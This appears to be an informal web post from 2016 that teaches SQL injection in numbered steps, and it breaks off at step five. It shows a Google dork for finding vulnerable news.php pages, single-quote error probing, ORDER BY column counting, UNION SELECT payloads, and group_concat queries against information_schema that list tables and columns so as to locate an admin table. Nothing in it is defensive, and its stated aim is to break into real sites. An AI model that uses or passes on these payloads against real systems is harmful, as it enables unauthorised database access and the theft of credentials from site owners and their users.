1. This Tut is a very Simple one cos i'm gonna explain it in a very simple way. I will explain this SQLi hacking in just7 easy steps! --Step1: use ur google dork to find a vuln web for SqlI eg inurl:news.php?id= site:.in. We got our web www.site.in/ne ws.php?id=5 . w add ' to the end of the url it will look like www.site.in/ne ws.php?id=5' if its vulnerable, you will get an eror msg like You have a MySql error in bla bla near "/" , if its not, look for another web. --Step 2: use ur order by query to know how many columns exist in the web. If you get a msg lyk unknown column "12" in order clause, you must keep changing the numbers either in increasing order or decreasing order until the site loads normally eg you use order+by+6--Error till order +by+4--No Error . . .that means the web has 4 columns It will be like www.site.in/ne ws.php? id=5+or de r+by+4. --Step3: since you know that the web has 4 columns, its time to use the union+select query to know the vulnerable column to do all our injections, sometimes your vuln column can be more that 2, justpick 1 to work on. It wil be like this www.site.in/ne ws.php?id=-5+u ni on +select +1,2,3,4-- then the vuln column will show, here lets say the vuln column is 2, dat minz its 2 all our injections will take place. --Step4: ur url will be like this now www.site.in/ne ws.php?id=-5+u ni on+select +1,group_concat (table_name),3,4+from +information_schema.tables +where+table_schema=database()-- --Step5: afta doing step4 some tables will appear, if ur lucky u will c d admin table direct with name admin, now its time to "hex" that table if not you guess wich one is the admin table. Now goto stringnote.com /tools /texttohex.php and put admin in d box and hex it, u wil see nombaz all d same but in difrent format pick d 1 datz joined 2geda eg 696e41d3 and execute ur code lyk dis www.site.in/ne ws.php?id=-5+u ni on +select +1,group_concat (column_name),3,4+from +information_schema.columns
Thank's for reading my article
HOW TO HACKA WEB USING SQLCreated at 2016-09-30 18:33:33
Tags:
A
,
HACK
,
how
,
SQL
,
to
,
using
,
web
0
LikeStar
Share: